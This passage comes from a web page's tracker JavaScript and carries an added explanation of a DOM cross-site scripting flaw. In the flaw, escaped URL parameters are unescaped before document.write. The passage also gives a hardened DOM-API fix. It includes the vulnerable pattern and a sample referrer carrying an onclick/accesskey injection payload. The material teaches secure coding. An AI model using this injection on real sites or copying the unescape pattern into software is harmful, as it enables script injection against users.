        var str_tracker_lastAccess_datetime = GetCookie(str_cookie_datetime);
        SetCookie(str_cookie_datetime, GetCurrentDateTime(), 365*24);
        if (str_tracker_lastAccess_datetime==null)
            str_tracker_lastAccess_datetime = "";
        // location.href and document.referrer are escape()d here ...
        var pars = '&isFirstAccess=' + str_firstAccessUser + '&location=' + escape(location.href) + '&referrer=' + escape(document.referrer) + '&lastAccessDateTime=' + escape(str_tracker_lastAccess_datetime);
        // ... but the whole markup string is unescape()d before document.write, which undoes that encoding
        document.write(unescape("%3Cscript src='" + url + pars + "' type='text/javascript'%3E%3C/script%3E"));
    }catch(e){}
}
</script>
<script type="text/javascript">AddTrackerCount('/sitefiles/services/cms/PageService.aspx?type=AddTrackerCount&publishmentSystemID=1&channelID=17&contentID=269', 1);</script>
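Both DOM cases above end in document.write with location.href and document.referrer pasted into a <script src='...'> string. In case two each parameter is escape()d, but the whole string is then unescape()d, which decodes the %27 back into the quote that closes the src attribute. The block below is an added example, not code from the page or from the site it describes: the page's pattern reproduced with constructed inputs, an encodeURIComponent variant that still fails because that function leaves the single quote alone, and a DOM-API version that builds the query with URLSearchParams and sets script.src directly so no markup is parsed from request data. The attachTracker function, its doc parameter and the sample URLs are assumptions of the example.

```javascript
// Added example (not from the page): the escape()/unescape() tracker pattern
// shown above beside a DOM-API version that never parses markup built from
// request data. All inputs below are constructed for the example.
const SAMPLE_HREF = 'http://192.168.106.141/1.html';
const SAMPLE_REFERRER = "http://\"'accesskey='X'onclick='alert(/xss/)'//";

// What the HTML parser would take as the src attribute: up to the first quote.
function parsedSrc(markup) {
  const m = /src='([^']*)'/.exec(markup);
  return m ? m[1] : null;
}

// The page's pattern: escape() each parameter, then unescape() the whole
// string, which turns %27 back into a quote and removes the protection.
function trackerMarkupUnescaped(url, href, referrer) {
  const pars = '&location=' + escape(href) + '&referrer=' + escape(referrer);
  return unescape("%3Cscript src='" + url + pars + "' type='text/javascript'%3E%3C/script%3E");
}

// A common "fix" that is still wrong: encodeURIComponent() does not encode
// the single quote, so inside a single-quoted attribute the quote still
// terminates the attribute early.
function trackerMarkupEncoded(url, href, referrer) {
  const pars = '&location=' + encodeURIComponent(href) + '&referrer=' + encodeURIComponent(referrer);
  return "<script src='" + url + pars + "' type='text/javascript'></script>";
}

// Hardened: build the query with URLSearchParams (which percent-encodes the
// quote as %27) and create the element through the DOM, so no HTML is ever
// parsed from request data. `doc` is passed in so the function can run
// outside a browser; in a page, pass `document`. Returns the src that was set.
function attachTracker(doc, baseUrl, href, referrer) {
  const qs = new URLSearchParams({ location: href, referrer: referrer });
  const script = doc.createElement('script');
  script.type = 'text/javascript';
  script.src = baseUrl + (baseUrl.includes('?') ? '&' : '?') + qs.toString();
  doc.head.appendChild(script);
  return script.src;
}
```

The general rule the three functions illustrate: encoding chosen for one context (URL query) does not make a value safe in another (HTML attribute), and the reliable fix for DOM XSS of this shape is to stop generating markup from data and use the DOM API instead.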
